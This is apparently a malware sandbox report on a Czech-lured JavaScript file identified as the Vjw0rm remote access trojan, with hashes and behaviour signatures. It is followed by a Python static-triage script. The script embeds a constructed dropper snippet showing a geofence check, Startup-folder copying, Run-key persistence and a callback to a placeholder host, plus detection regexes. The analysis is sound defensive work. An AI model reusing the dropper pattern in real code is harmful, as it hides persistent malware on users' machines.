Resubmissions

21-07-2023 10:49

230721-mw6a3aec65 10

21-07-2023 10:47

230721-mvvsyaec59 10

General

  • Target

    d1e0c6ab322c2c9a2bab04afde8cea05-sample.zip

  • Size

    17KB

  • Sample

    230721-mvvsyaec59

  • MD5

    52da0058b4d27255bf7ab352a7232a86

  • SHA1

    371beb3b18814af20d02ac1e200538b71065c74b

  • SHA256

    1cec95c97922a926105fe176ac71885f52b6ddfae8e0901f1c1c9e901f083363

  • SHA512

    e217adae3c34fa2a362bc8ac272425be0e399fba9d3dafd3b25f46b5249c8b5ac63246ee32fb56f22414d884d8036aba26639b90db656615465fe22a282cc793

  • SSDEEP

    384:navrH2e8p32QWDFesZByGoDBGXjPKaPdj+OjpBwhdc2rCkn:nkA2TcUyGYBGL/dq6ToW3kn

Malware Config

Targets

    • Target

      Specifikace objednvky.js

    • Size

      24KB

    • MD5

      4272d76e2efed7d323e14bccef987913

    • SHA1

      a8cde379b41cfafb036896484844620a7fcc11c6

    • SHA256

      39372ec10b2720511f8ca94e8aed43273c507637ec03f9a1eac279aadeb22c55

    • SHA512

      717ca100e5f2463b8aa675185e2dbd743a015fffe7654dab2b227691ed66e9443a3e387d31c3eeed63a22d1b3f77b213feec3c3fe6c1438ddf5313066f2583a9

    • SSDEEP

      384:0B+UO8kwlbBtHS0ihYvG3bMZcCOQHp4aIX6xEzWZNxFlumanjjjIYNFLD5zvOJ:09ewl7tGr+Oy4aPOL13IoFLdzGJ

    • Vjw0rm

      Vjw0rm is a remote access trojan written in JavaScript.

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely to geofence execution. The lure filename is Czech (the title means "order specification"), consistent with a regionally targeted campaign.

    • Drops startup file

    • Adds Run key to start application
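
The signatures above can be reproduced with a quick static triage pass before the sample is ever detonated. The Python below is an added example, not the sandbox's own signature logic or any code from the report: the JavaScript it scans is a constructed stand-in (not the Vjw0rm sample), and the registry paths, WScript.Shell calls and XMLHTTP ProgIDs it looks for are assumptions about how a WSH dropper typically geofences, persists via the Startup folder and a Run key, and phones home. It also computes the four digests the report lists so a fresh copy can be matched against the recorded values.

```python
"""Static triage of a WSH JavaScript dropper for the behaviours the report flags.

Added example, not part of the sandbox report. SAMPLE_JS is constructed for
illustration and is NOT the analysed sample; the patterns in RULES are
assumptions about common dropper idioms, not the sandbox's signature logic.
"""
import hashlib
import re

# Constructed sample (not the real file): geofence check, Startup-folder copy,
# Run-key persistence and an HTTP request, the way a JS RAT dropper does it.
SAMPLE_JS = r'''
var sh = new ActiveXObject("WScript.Shell");
var cc = sh.RegRead("HKCU\\Control Panel\\International\\sCountry");
if (cc == "Czech Republic") { WScript.Quit(); }
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dst = sh.SpecialFolders("Startup") + "\\svchost.js";
fso.CopyFile(WScript.ScriptFullName, dst, true);
sh.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost",
            "wscript.exe //B " + dst, "REG_SZ");
var req = new ActiveXObject("MSXML2.XMLHTTP");
req.open("GET", "http://example.invalid/gate", false); req.send();
'''

# One rule per signature name from the report. The regexes are assumptions
# about how each behaviour usually appears in WSH JavaScript (JS string
# literals escape backslashes, hence the doubled backslashes in the patterns).
RULES = {
    "Checks computer location settings": re.compile(
        r'RegRead\s*\(\s*"HK(?:CU|LM|EY_[A-Z_]+)\\\\'
        r'(?:Control Panel\\\\International|SYSTEM\\\\CurrentControlSet\\\\Control\\\\Nls)',
        re.I),
    "Drops startup file": re.compile(
        r'SpecialFolders\s*\(\s*"Startup"\s*\)|\\\\Start Menu\\\\Programs\\\\Startup', re.I),
    "Adds Run key to start application": re.compile(
        r'RegWrite\s*\(\s*"HK(?:CU|LM)\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run',
        re.I),
    "Blocklisted process makes network request": re.compile(
        r'ActiveXObject\s*\(\s*"(?:MSXML2|Microsoft)\.(?:Server)?XMLHTTP', re.I),
}


def scan(js_text: str) -> dict[str, list[str]]:
    """Return {signature name: [matching source lines]} for every rule that fires."""
    hits: dict[str, list[str]] = {}
    for line in js_text.splitlines():
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(line.strip())
    return hits


def geofence_targets(js_text: str) -> list[str]:
    """Extract string literals whose comparison leads straight to WScript.Quit,
    i.e. the locales the dropper refuses to run in (assumed idiom)."""
    return re.findall(r'(?:==|!=)\s*"([^"]+)"\s*\)\s*\{[^}]*Quit', js_text)


def hashes(data: bytes) -> dict[str, str]:
    """MD5/SHA1/SHA256/SHA512 digests, the four the report records per file."""
    return {alg: hashlib.new(alg, data).hexdigest()
            for alg in ("md5", "sha1", "sha256", "sha512")}


def matches_report(data: bytes, expected: dict[str, str]) -> set[str]:
    """Names of the algorithms whose digest of `data` equals the recorded value."""
    got = hashes(data)
    return {alg for alg, digest in expected.items() if got.get(alg) == digest.lower()}


if __name__ == "__main__":
    for sig, lines in scan(SAMPLE_JS).items():
        print(f"[+] {sig}")
        for ln in lines:
            print(f"      {ln}")
    print("geofenced locales:", geofence_targets(SAMPLE_JS))
    # The report's MD5 for the inner script; the constructed sample will not match.
    report_md5 = {"md5": "4272d76e2efed7d323e14bccef987913"}
    print("matches report:", matches_report(SAMPLE_JS.encode(), report_md5) or "none")
```

Treat the scan as a triage aid, not a verdict: obfuscated droppers build these strings at runtime, so a clean static pass is exactly the case where the sandbox run (and its "Blocklisted process makes network request" hit on wscript.exe) still matters.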

MITRE ATT&CK Enterprise v15

Tasks